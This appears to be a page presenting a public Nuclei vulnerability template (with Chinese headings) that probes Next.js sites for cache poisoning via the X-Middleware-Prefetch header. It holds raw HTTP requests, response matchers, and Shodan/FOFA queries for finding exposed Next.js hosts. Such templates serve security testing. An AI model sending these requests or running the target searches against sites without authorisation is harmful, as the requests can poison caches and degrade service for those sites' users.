漏洞描述
Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch.
nextjs-middleware-cache: Next.js - Cache Poisoning
PoC代码[已公开]
id: nextjs-middleware-cache
info:
name: Next.js - Cache Poisoning
author: DhiyaneshDk
severity: high
description: |
Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
metadata:
verified: true
vendor: vercel
product: next.js
framework: node.js
shodan-query:
- http.html:"/_next/static"
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: nextjs,cache,vuln
variables:
rand: "{{rand_text_numeric(5)}}"
http:
- raw:
- |
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
X-Middleware-Prefetch: 1
Priority: u=1
- |
@timeout: 10s
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
X-Middleware-Prefetch: 1
Priority: u=1
- |
@timeout: 10s
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_2 == 200 && contains(all_headers_2, 'X-Middleware-Skip: 1') && !contains(cache_control_2, 'no-cache') && !contains(pragma_2, 'no-cache')"
- "status_code_3 == 200 && contains(all_headers_3, 'X-Middleware-Skip: 1') && !contains(cache_control_3, 'no-cache') && !contains(pragma_3, 'no-cache')"
condition: and
# digest: 490a0046304402201de2e605fd1dedf99328fc7a3049802725c96853d835abd9f1efced0f9ef602f022067fb135fa0fd70c30feaa06acd7354d69537cb778c66dd4e7acf828d7467b0d7:922c64590222798bb761d5b6d8e72950